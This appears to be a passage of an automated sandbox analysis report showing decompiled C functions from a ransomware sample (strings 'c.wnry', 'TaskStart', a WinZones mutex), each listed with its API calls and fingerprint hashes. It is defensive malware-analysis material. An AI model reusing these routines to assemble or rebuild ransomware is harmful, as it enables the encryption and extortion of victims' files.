            				memset( &_v410, 0, _t56 << 2);
            				asm("stosw");
            				GetComputerNameW( &_v412,  &_v12);
            				_v8 = _v8 & 0x00000000;
            				_t54 = 1;
            				if(wcslen( &_v412) > 0) {
            					_t72 =  &_v412;
            					do {
            						_t54 = _t54 * ( *_t72 & 0x0000ffff);
            						_v8 = _v8 + 1;
            						_t72 =  &(_t72[1]);
            					} while (_v8 < wcslen( &_v412));
            				}
            				srand(_t54);
            				_t42 = rand();
            				_t71 = 0;
            				asm("cdq");
            				_t60 = 8;
            				_t76 = _t42 % _t60 + _t60;
            				if(_t76 > 0) {
            					do {
            						_t48 = rand();
            						asm("cdq");
            						_t62 = 0x1a;
            						 *((char*)(_t71 + _a4)) = _t48 % _t62 + 0x61;
            						_t71 = _t71 + 1;
            					} while (_t71 < _t76);
            				}
            				_t77 = _t76 + 3;
            				while(_t71 < _t77) {
            					_t45 = rand();
            					asm("cdq");
            					_t61 = 0xa;
            					 *((char*)(_t71 + _a4)) = _t45 % _t61 + 0x30;
            					_t71 = _t71 + 1;
            				}
            				_t44 = _a4;
            				 *(_t71 + _t44) =  *(_t71 + _t44) & 0x00000000;
            				return _t44;
            			}

            APIs
            Memory Dump Source
            • Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmp
            Yara matches
            Similarity
            • API ID: rand$wcslen$ComputerNamesrand
            • String ID:
            • API String ID: 3058258771-0
            • Opcode ID: b0791ced207a07d975efd615d75f91e7379ad7fc4ff6fb2c179a53625b9ec986
            • Instruction ID: 153b78e0bdef4b648922335b0398b7079fc1e42e5dbb3c53d325bf346215f47a
            • Opcode Fuzzy Hash: b0791ced207a07d975efd615d75f91e7379ad7fc4ff6fb2c179a53625b9ec986
            • Instruction Fuzzy Hash: FA212833A00318ABD7119B65ED81BDD77A8EB45354F1100BBF948F71C0CA759EC28BA8
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00407070(char* _a4, char* _a8) {
            				char _v264;
            				void _v524;
            				long _t16;
            				char* _t30;
            				char* _t31;
            				char* _t36;
            				char* _t38;
            				int _t40;
            				void* _t41;
            
            				_t30 = _a4;
            				if(_t30 != 0 && GetFileAttributesA(_t30) == 0xffffffff) {
            					CreateDirectoryA(_t30, 0);
            				}
            				_t36 = _a8;
            				_t16 =  *_t36;
            				if(_t16 != 0) {
            					_t38 = _t36;
            					_t31 = _t36;
            					do {
            						if(_t16 == 0x2f || _t16 == 0x5c) {
            							_t38 = _t31;
            						}
            						_t16 = _t31[1];
            						_t31 =  &(_t31[1]);
            					} while (_t16 != 0);
            					if(_t38 != _t36) {
            						_t40 = _t38 - _t36;
            						memcpy( &_v524, _t36, _t40);
            						 *(_t41 + _t40 - 0x208) =  *(_t41 + _t40 - 0x208) & 0x00000000;
            						E00407070(_t30,  &_v524);
            					}
            					_v264 = _v264 & 0x00000000;
            					if(_t30 != 0) {
            						strcpy( &_v264, _t30);
            					}
            					strcat( &_v264, _t36);
            					_t16 = GetFileAttributesA( &_v264);
            					if(_t16 == 0xffffffff) {
            						return CreateDirectoryA( &_v264, 0);
            					}
            				}
            				return _t16;
            			}

            APIs
            • GetFileAttributesA.KERNEL32(?,?,?), ref: 00407083
            • CreateDirectoryA.KERNEL32(?,00000000), ref: 00407091
            • memcpy.MSVCRT(?,0000002F,0000002F,?,?,?), ref: 004070CA
            • strcpy.MSVCRT(00000000,?,?,?), ref: 004070FB
            • strcat.MSVCRT(00000000,0000002F,?,?), ref: 0040710A
            • GetFileAttributesA.KERNEL32(00000000,?,?), ref: 00407118
            • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0040712C
            Memory Dump Source
            • Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmp
            Yara matches
            Similarity
            • API ID: AttributesCreateDirectoryFile$memcpystrcatstrcpy
            • String ID:
            • API String ID: 2935503933-0
            • Opcode ID: 0838382564994867704b48d197d9141456e9ef10b941a736ac2fad3accdc9566
            • Instruction ID: 50ba023859918e707bf45bf33fbe73a6a33da9a39eec2eddc6b78618a8cc3524
            • Opcode Fuzzy Hash: 0838382564994867704b48d197d9141456e9ef10b941a736ac2fad3accdc9566
            • Instruction Fuzzy Hash: 1A112B72C0821456CB305B749D88FD7776C9B11320F1403BBE595B32C2DA78BD898669
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00401EFF(intOrPtr _a4) {
            				char _v104;
            				void* _t9;
            				void* _t11;
            				void* _t12;
            
            				sprintf( &_v104, "%s%d", "Global\\MsWinZonesCacheCounterMutexA", 0);
            				_t12 = 0;
            				if(_a4 <= 0) {
            					L3:
            					return 0;
            				} else {
            					goto L1;
            				}
            				while(1) {
            					L1:
            					_t9 = OpenMutexA(0x100000, 1,  &_v104);
            					if(_t9 != 0) {
            						break;
            					}
            					Sleep(0x3e8);
            					_t12 = _t12 + 1;
            					if(_t12 < _a4) {
            						continue;
            					}
            					goto L3;
            				}
            				CloseHandle(_t9);
            				_t11 = 1;
            				return _t11;
            			}

            APIs
            • sprintf.MSVCRT(?,%s%d,Global\MsWinZonesCacheCounterMutexA,00000000), ref: 00401F16
            • OpenMutexA.KERNEL32(00100000,00000001,?), ref: 00401F31
            • Sleep.KERNEL32(000003E8), ref: 00401F40
            • CloseHandle.KERNEL32(00000000), ref: 00401F52
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmp
            Yara matches
            Similarity
            • API ID: CloseHandleMutexOpenSleepsprintf
            • String ID: %s%d$Global\MsWinZonesCacheCounterMutexA
            • API String ID: 2780352083-2959021817
            • Opcode ID: d195781efe0b704a0c45d33d3827b966fde6c598e7eccee7cfdb972a19423a06
            • Instruction ID: f4a3b48a0bafa41ae68b0177be176e29d76f271436d11399ade0a1af8f7a19ee
            • Opcode Fuzzy Hash: d195781efe0b704a0c45d33d3827b966fde6c598e7eccee7cfdb972a19423a06
            • Instruction Fuzzy Hash: 92F0E931A40305BBDB20EBA49E4AB9B7758AB04B40F104036F945FA0D2DBB8D54586D8
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 59%
            			E00403A77(void* __ecx, void* _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
            				void* _v12;
            				char _v16;
            				intOrPtr _v32;
            				intOrPtr _v36;
            				intOrPtr _v48;
            				signed int _t121;
            				int _t124;
            				intOrPtr* _t126;
            				intOrPtr _t127;
            				int _t131;
            				intOrPtr* _t133;
            				intOrPtr _t135;
            				intOrPtr _t137;
            				signed int _t139;
            				signed int _t140;
            				signed int _t143;
            				signed int _t150;
            				intOrPtr _t160;
            				int _t161;
            				int _t163;
            				signed int _t164;
            				signed int _t165;
            				intOrPtr _t168;
            				void* _t169;
            				signed int _t170;
            				signed int _t172;
            				signed int _t175;
            				signed int _t178;
            				intOrPtr _t194;
            				void* _t195;
            				void* _t196;
            				void* _t197;
            				intOrPtr _t198;
            				void* _t201;
            
            				_t197 = __ecx;
            				if( *((intOrPtr*)(__ecx + 4)) == 0) {
            					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
            					_push(0x40d570);
            					_push( &_v16);
            					L0040776E();
            				}
            				_t121 = _a12;
            				if(_t121 == 0) {
            					L15:
            					__imp__??0exception@@QAE@ABQBD@Z(0x40f574);
            					_push(0x40d570);
            					_push( &_v16);
            					L0040776E();
            					_push( &_v16);
            					_push(0);
            					_push(_t197);
            					_t198 = _v36;
            					_t194 = _v32;
            					_t168 =  *((intOrPtr*)(_t198 + 0x30));
            					_t160 =  *((intOrPtr*)(_t198 + 0x34));
            					_t71 = _t194 + 0xc; // 0x40d568
            					_v48 =  *_t71;
            					_v32 = _t168;
            					if(_t168 > _t160) {
            						_t160 =  *((intOrPtr*)(_t198 + 0x2c));
            					}
            					_t75 = _t194 + 0x10; // 0x19930520
            					_t124 =  *_t75;
            					_t161 = _t160 - _t168;
            					if(_t161 > _t124) {
            						_t161 = _t124;
            					}
            					if(_t161 != 0 && _a8 == 0xfffffffb) {
            						_a8 = _a8 & 0x00000000;
            					}
            					 *((intOrPtr*)(_t194 + 0x14)) =  *((intOrPtr*)(_t194 + 0x14)) + _t161;
            					 *(_t194 + 0x10) = _t124 - _t161;
            					_t126 =  *((intOrPtr*)(_t198 + 0x38));
            					if(_t126 != 0) {
            						_t137 =  *_t126( *((intOrPtr*)(_t198 + 0x3c)), _t168, _t161);
            						 *((intOrPtr*)(_t198 + 0x3c)) = _t137;
            						_t201 = _t201 + 0xc;
            						 *((intOrPtr*)(_t194 + 0x30)) = _t137;
            					}
            					if(_t161 != 0) {
            						memcpy(_v12, _a4, _t161);
            						_v12 = _v12 + _t161;
            						_t201 = _t201 + 0xc;
            						_a4 = _a4 + _t161;
            					}
            					_t127 =  *((intOrPtr*)(_t198 + 0x2c));
            					if(_a4 == _t127) {
            						_t169 =  *((intOrPtr*)(_t198 + 0x28));
            						_a4 = _t169;
            						if( *((intOrPtr*)(_t198 + 0x34)) == _t127) {
            							 *((intOrPtr*)(_t198 + 0x34)) = _t169;
            						}
            						_t99 = _t194 + 0x10; // 0x19930520
            						_t131 =  *_t99;
            						_t163 =  *((intOrPtr*)(_t198 + 0x34)) - _t169;
            						if(_t163 > _t131) {
            							_t163 = _t131;
            						}
            						if(_t163 != 0 && _a8 == 0xfffffffb) {
            							_a8 = _a8 & 0x00000000;
            						}
            						 *((intOrPtr*)(_t194 + 0x14)) =  *((intOrPtr*)(_t194 + 0x14)) + _t163;
            						 *(_t194 + 0x10) = _t131 - _t163;
            						_t133 =  *((intOrPtr*)(_t198 + 0x38));
            						if(_t133 != 0) {
            							_t135 =  *_t133( *((intOrPtr*)(_t198 + 0x3c)), _t169, _t163);
            							 *((intOrPtr*)(_t198 + 0x3c)) = _t135;
            							_t201 = _t201 + 0xc;
            							 *((intOrPtr*)(_t194 + 0x30)) = _t135;
            						}
            						if(_t163 != 0) {
            							memcpy(_v12, _a4, _t163);
            							_v12 = _v12 + _t163;
            							_a4 = _a4 + _t163;
            						}
            					}
            					 *(_t194 + 0xc) = _v12;
            					 *((intOrPtr*)(_t198 + 0x30)) = _a4;
            					return _a8;
            				} else {
            					_t170 =  *(_t197 + 0x3cc);
            					if(_t121 % _t170 != 0) {
            						goto L15;
            					} else {
            						if(_a16 != 1) {
            							_t195 = _a4;
            							_t139 = _a12;
            							_a16 = 0;
            							_t164 = _a8;
            							if(_a16 != 2) {
            								_t140 = _t139 / _t170;
            								if(_t140 > 0) {
            									do {
            										E00403797(_t197, _t195, _t164);
            										_t172 =  *(_t197 + 0x3cc);
            										_t195 = _t195 + _t172;
            										_t143 = _a12 / _t172;
            										_t164 = _t164 + _t172;
            										_a16 = _a16 + 1;
            									} while (_a16 < _t143);
            									return _t143;
            								}
            							} else {
            								_t140 = _t139 / _t170;
            								if(_t140 > 0) {
            									do {
            										E0040350F(_t197, _t197 + 0x3f0, _t164);
            										E00403A28(_t197, _t164, _t195);
            										memcpy(_t197 + 0x3f0, _t195,  *(_t197 + 0x3cc));
            										_t175 =  *(_t197 + 0x3cc);
            										_t201 = _t201 + 0xc;
            										_t150 = _a12 / _t175;
            										_t195 = _t195 + _t175;
            										_t164 = _t164 + _t175;
            										_a16 = _a16 + 1;
            									} while (_a16 < _t150);
            									return _t150;
            								}
            							}
            						} else {
            							_t196 = _a4;
            							_t140 = _a12 / _t170;
            							_a16 = 0;
            							_t165 = _a8;
            							if(_t140 > 0) {
            								do {
            									E00403797(_t197, _t196, _t165);
            									E00403A28(_t197, _t165, _t197 + 0x3f0);
            									memcpy(_t197 + 0x3f0, _t196,  *(_t197 + 0x3cc));
            									_t178 =  *(_t197 + 0x3cc);
            									_t201 = _t201 + 0xc;
            									_t140 = _a12 / _t178;
            									_t196 = _t196 + _t178;
            									_t165 = _t165 + _t178;
            									_a16 = _a16 + 1;
            								} while (_a16 < _t140);
            							}
            						}
            						return _t140;
            					}
            				}
            			}

            APIs
            • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,00000001), ref: 00403A91
            • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,00000001), ref: 00403AA0
            • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403B00
            • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403B68
            • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F574,?,?,?,?,?,00000001), ref: 00403BC2
            • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,00000001), ref: 00403BD1
            Memory Dump Source
            • Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmp
            Yara matches
            Similarity
            • API ID: ??0exception@@ExceptionThrowmemcpy
            • String ID:
            • API String ID: 2382887404-0
            • Opcode ID: 8f0cb0103d3614fdc28d84a5f541c19cbd02f6e6265a1098423f4cf3f0921468
            • Instruction ID: 9805a50700f74263afb1320d00d27f30e93ca80038ec105a2d2f515762341bf2
            • Opcode Fuzzy Hash: 8f0cb0103d3614fdc28d84a5f541c19cbd02f6e6265a1098423f4cf3f0921468
            • Instruction Fuzzy Hash: 8541C870B40206ABDB14DE65DD81D9B77BEEB84309B00443FF815B3281D778AB15C759
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • fopen.MSVCRT(c.wnry,0040E018), ref: 0040101B
            • fread.MSVCRT(?,0000030C,00000001,00000000), ref: 0040103F
            • fwrite.MSVCRT(?,0000030C,00000001,00000000), ref: 00401047
            • fclose.MSVCRT(00000000), ref: 00401058
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmp
            Yara matches
            Similarity
            • API ID: fclosefopenfreadfwrite
            • String ID: c.wnry
            • API String ID: 4000964834-3240288721
            • Opcode ID: 83356dae967f3845aa64eafaf8b7e6f79fd4dc7784855bee587f11601882f661
            • Instruction ID: 4fc4ee2583eead98f325da0eb4a8e2a7a7827d82b7f69226d67b1691b23a23d5
            • Opcode Fuzzy Hash: 83356dae967f3845aa64eafaf8b7e6f79fd4dc7784855bee587f11601882f661
            • Instruction Fuzzy Hash: 0CF05931204260ABCA301F656D4AA277B10DBC4F61F10083FF1C1F40E2CABD44C296BE
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 24%
            			E004018F9(intOrPtr _a4, intOrPtr _a8, CHAR* _a12) {
            				struct _OVERLAPPED* _v8;
            				char _v20;
            				long _v32;
            				struct _OVERLAPPED* _v36;
            				long _v40;
            				signed int _v44;
            				void* _t18;
            				void* _t28;
            				long _t34;
            				intOrPtr _t38;
            
            				_push(0xffffffff);
            				_push(0x4081f0);
            				_push(0x4076f4);
            				_push( *[fs:0x0]);
            				 *[fs:0x0] = _t38;
            				_v44 = _v44 | 0xffffffff;
            				_v32 = 0;
            				_v36 = 0;
            				_v8 = 0;
            				_t18 = CreateFileA(_a12, 0x80000000, 1, 0, 3, 0, 0);
            				_v44 = _t18;
            				if(_t18 != 0xffffffff) {
            					_t34 = GetFileSize(_t18, 0);
            					_v40 = _t34;
            					if(_t34 != 0xffffffff && _t34 <= 0x19000) {
            						_t28 = GlobalAlloc(0, _t34);
            						_v36 = _t28;
            						if(_t28 != 0 && ReadFile(_v44, _t28, _t34,  &_v32, 0) != 0) {
            							_push(_a8);
            							_push(0);
            							_push(0);
            							_push(_v32);
            							_push(_t28);
            							_push(_a4);
            							if( *0x40f898() != 0) {
            								_push(1);
            								_pop(0);
            							}
            						}
            					}
            				}
            				_push(0xffffffff);
            				_push( &_v20);
            				L004076FA();
            				 *[fs:0x0] = _v20;
            				return 0;
            			}

            APIs
            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,00401448,?), ref: 0040193A
            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,00401448,?), ref: 0040194A
            • GlobalAlloc.KERNEL32(00000000,00000000,?,?,?,?,?,?,00401448,?), ref: 00401964
            • ReadFile.KERNEL32(000000FF,00000000,00000000,?,00000000,?,?,?,?,?,?,00401448,?), ref: 0040197D
            • _local_unwind2.MSVCRT(?,000000FF,?,?,?,?,?,?,00401448,?), ref: 004019A6
            Memory Dump Source
            • Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmp
            Yara matches
            Similarity
            • API ID: File$AllocCreateGlobalReadSize_local_unwind2
            • String ID:
            • API String ID: 2811923685-0
            • Opcode ID: 232dc3714e51fefb2f6fb0f5b065eea7eb2b0009f41f45388587d49ab84ddf28
            • Instruction ID: fb063a64e2dc49fc25d010f75d45645ced701e765f932c996de96a45c5b9f027
            • Opcode Fuzzy Hash: 232dc3714e51fefb2f6fb0f5b065eea7eb2b0009f41f45388587d49ab84ddf28
            • Instruction Fuzzy Hash: B62160B1901624AFCB209B99CD48FDF7E78EB097B0F54022AF525B22E0D7785805C6AC
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 97%
            			E00405BAE(CHAR* _a4, intOrPtr _a8, long _a12, void* _a16) {
            				char _v5;
            				char _v6;
            				long _t30;
            				char _t32;
            				long _t34;
            				void* _t46;
            				intOrPtr* _t49;
            				long _t50;
            
            				_t30 = _a12;
            				if(_t30 == 1 || _t30 == 2 || _t30 == 3) {
            					_t49 = _a16;
            					_t46 = 0;
            					_v6 = 0;
            					 *_t49 = 0;
            					_v5 = 0;
            					if(_t30 == 1) {
            						_t46 = _a4;
            						_v5 = 0;
            						L11:
            						_t30 = SetFilePointer(_t46, 0, 0, 1);
            						_v6 = _t30 != 0xffffffff;
            						L12:
            						_push(0x20);
            						L00407700();
            						_t50 = _t30;
            						if(_a12 == 1 || _a12 == 2) {
            							 *_t50 = 1;
            							 *((char*)(_t50 + 0x10)) = _v5;
            							_t32 = _v6;
            							 *((char*)(_t50 + 1)) = _t32;
            							 *(_t50 + 4) = _t46;
            							 *((char*)(_t50 + 8)) = 0;
            							 *((intOrPtr*)(_t50 + 0xc)) = 0;
            							if(_t32 != 0) {
            								 *((intOrPtr*)(_t50 + 0xc)) = SetFilePointer(_t46, 0, 0, 1);
            							}
            						} else {
            							 *_t50 = 0;
            							 *((intOrPtr*)(_t50 + 0x14)) = _a4;
            							 *((char*)(_t50 + 1)) = 1;
            							 *((char*)(_t50 + 0x10)) = 0;
            							 *((intOrPtr*)(_t50 + 0x18)) = _a8;
            							 *((intOrPtr*)(_t50 + 0x1c)) = 0;
            							 *((intOrPtr*)(_t50 + 0xc)) = 0;
            						}
            						 *_a16 = 0;
            						_t34 = _t50;
            						goto L18;
            					}
            					if(_t30 != 2) {
            						goto L12;
            					}
            					_t46 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
            					if(_t46 != 0xffffffff) {
            						_v5 = 1;
            						goto L11;
            					}
            					 *_t49 = 0x200;
            					goto L8;
            				} else {
            					 *_a16 = 0x10000;
            					L8:
            					_t34 = 0;
            					L18:
            					return _t34;
            				}
            			}

            APIs
            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001), ref: 00405BFE
            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA,00000000), ref: 00405C29
            • ??2@YAPAXI@Z.MSVCRT(00000020,?,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA,00000000,004020D5,?), ref: 00405C38
            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA), ref: 00405C8A
            Memory Dump Source
            • Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmp
            Yara matches
            Similarity
            • API ID: File$Pointer$??2@Create
            • String ID:
            • API String ID: 1331958074-0
            • Opcode ID: ff1e72f22e15843ade9ace39703012fff21b8a1e8b9c48cc3c9963cb15211f94
            • Instruction ID: 771dcc1d5a31089dd4cc2aab62cbbe5a226dda330bf0289da8f54b52fc8588cb
            • Opcode Fuzzy Hash: ff1e72f22e15843ade9ace39703012fff21b8a1e8b9c48cc3c9963cb15211f94
            • Instruction Fuzzy Hash: 0831F231008784AFDB318F28888479BBBF4EF15350F18896EF491A7380C375AD85CB69
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 37%
            			E00402924(intOrPtr* _a4, char _a8) {
            				intOrPtr _v8;
            				intOrPtr* _t26;
            				intOrPtr* _t28;
            				void* _t29;
            				intOrPtr _t30;
            				void* _t32;
            				signed int _t33;
            				signed int _t37;
            				signed short* _t41;
            				intOrPtr _t44;
            				intOrPtr _t49;
            				intOrPtr* _t55;
            				intOrPtr _t58;
            				void* _t59;
            
            				_t26 = _a4;
            				_t44 =  *((intOrPtr*)(_t26 + 4));
            				_t28 =  *_t26 + 0x78;
            				_v8 = _t44;
            				if( *((intOrPtr*)(_t28 + 4)) == 0) {
            					L11:
            					SetLastError(0x7f);
            					_t29 = 0;
            				} else {
            					_t58 =  *_t28;
            					_t30 =  *((intOrPtr*)(_t58 + _t44 + 0x18));
            					_t59 = _t58 + _t44;
            					if(_t30 == 0 ||  *((intOrPtr*)(_t59 + 0x14)) == 0) {
            						goto L11;
            					} else {
            						_t8 =  &_a8; // 0x402150
            						if( *_t8 >> 0x10 != 0) {
            							_t55 =  *((intOrPtr*)(_t59 + 0x20)) + _t44;
            							_t41 =  *((intOrPtr*)(_t59 + 0x24)) + _t44;
            							_a4 = 0;
            							if(_t30 <= 0) {
            								goto L11;
            							} else {
            								while(1) {
            									_t32 =  *_t55 + _t44;
            									_t15 =  &_a8; // 0x402150
            									__imp___stricmp( *_t15, _t32);
            									if(_t32 == 0) {
            										break;
            									}
            									_a4 = _a4 + 1;
            									_t55 = _t55 + 4;
            									_t41 =  &(_t41[1]);
            									if(_a4 <  *((intOrPtr*)(_t59 + 0x18))) {
            										_t44 = _v8;
            										continue;
            									} else {
            										goto L11;
            									}
            									goto L12;
            								}
            								_t33 =  *_t41 & 0x0000ffff;
            								_t44 = _v8;
            								goto L14;
            							}
            						} else {
            							_t9 =  &_a8; // 0x402150
            							_t37 =  *_t9 & 0x0000ffff;
            							_t49 =  *((intOrPtr*)(_t59 + 0x10));
            							if(_t37 < _t49) {
            								goto L11;
            							} else {
            								_t33 = _t37 - _t49;
            								L14:
            								if(_t33 >  *((intOrPtr*)(_t59 + 0x14))) {
            									goto L11;
            								} else {
            									_t29 =  *((intOrPtr*)( *((intOrPtr*)(_t59 + 0x1c)) + _t33 * 4 + _t44)) + _t44;
            								}
            							}
            						}
            					}
            				}
            				L12:
            				return _t29;
            			}
            0x00402928
            0x0040292f
            0x00402934
            0x00402938
            0x0040293e
            0x004029a5
            0x004029a7
            0x004029ad
            0x00402940
            0x00402940
            0x00402942
            0x00402946
            0x0040294a
            0x00000000
            0x00402951
            0x00402951
            0x0040295a
            0x00402971
            0x00402973
            0x00402977
            0x0040297a
            0x00000000
            0x0040297c
            0x00402981
            0x00402983
            0x00402986
            0x00402989
            0x00402993
            0x00000000
            0x00000000
            0x00402995
            0x00402998
            0x0040299f
            0x004029a3
            0x0040297e
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x004029a3
            0x004029b4
            0x004029b7
            0x00000000
            0x004029b7
            0x0040295c
            0x0040295c
            0x0040295c
            0x00402960
            0x00402965
            0x00000000
            0x00402967
            0x00402967
            0x004029ba
            0x004029bd
            0x00000000
            0x004029bf
            0x004029c8
            0x004029c8
            0x004029bd
            0x00402965
            0x0040295a
            0x0040294a
            0x004029af
            0x004029b3

            APIs
            • _stricmp.MSVCRT(P!@,?,?,0000DDB6,?,?,?,00402150,00000000,TaskStart), ref: 00402989
            • SetLastError.KERNEL32(0000007F,?,0000DDB6,?,?,?,00402150,00000000,TaskStart), ref: 004029A7
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmp
            Yara matches
            Similarity
            • API ID: ErrorLast_stricmp
            • String ID: P!@
            • API String ID: 1278613211-1774101457
            • Opcode ID: 03c3627be8870cecb91afdd38bef801573c0f783d9791e09bb9b18ce57a97af9
            • Instruction ID: aaf1e2d36ba78ebe43aa6e6aad127835d86855a49192f4e92224227a9dbc2408
            • Opcode Fuzzy Hash: 03c3627be8870cecb91afdd38bef801573c0f783d9791e09bb9b18ce57a97af9
            • Instruction Fuzzy Hash: 432180B1700605EFDB14CF19DA8486A73F6EF89310B29857AE846EB381D678ED41CB85
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 89%
            			E00401DFE(void* __eax) {
            				int _t21;
            				signed int _t27;
            				signed int _t29;
            				void* _t34;
            				void* _t36;
            				void* _t38;
            				void* _t40;
            				void* _t41;
            				void* _t43;
            
            				_t36 = __eax;
            				_t41 = _t40 + 0xc;
            				if(__eax != 0) {
            					 *(_t38 - 0x12c) =  *(_t38 - 0x12c) & 0x00000000;
            					_t29 = 0x4a;
            					memset(_t38 - 0x128, 0, _t29 << 2);
            					E004075C4(_t36, 0xffffffff, _t38 - 0x12c);
            					_t27 =  *(_t38 - 0x12c);
            					_t43 = _t41 + 0x18;
            					_t34 = 0;
            					if(_t27 > 0) {
            						do {
            							E004075C4(_t36, _t34, _t38 - 0x12c);
            							_t21 = strcmp(_t38 - 0x128, "c.wnry");
            							_t43 = _t43 + 0x14;
            							if(_t21 != 0 || GetFileAttributesA(_t38 - 0x128) == 0xffffffff) {
            								E0040763D(_t36, _t34, _t38 - 0x128);
            								_t43 = _t43 + 0xc;
            							}
            							_t34 = _t34 + 1;
            						} while (_t34 < _t27);
            					}
            					E00407656(_t36);
            					_push(1);
            					_pop(0);
            				} else {
            				}
            				return 0;
            			}
            0x00401dfe
            0x00401e00
            0x00401e05
            0x00401e0e
            0x00401e1a
            0x00401e21
            0x00401e2d
            0x00401e32
            0x00401e38
            0x00401e3b
            0x00401e3f
            0x00401e41
            0x00401e4a
            0x00401e5b
            0x00401e60
            0x00401e65
            0x00401e82
            0x00401e87
            0x00401e87
            0x00401e8a
            0x00401e8b
            0x00401e41
            0x00401e90
            0x00401e96
            0x00401e98
            0x00401e07
            0x00401e07
            0x00401e9d

            APIs
            • strcmp.MSVCRT(?,c.wnry,?,00000000,?), ref: 00401E5B
            • GetFileAttributesA.KERNEL32(?), ref: 00401E6E
            Strings
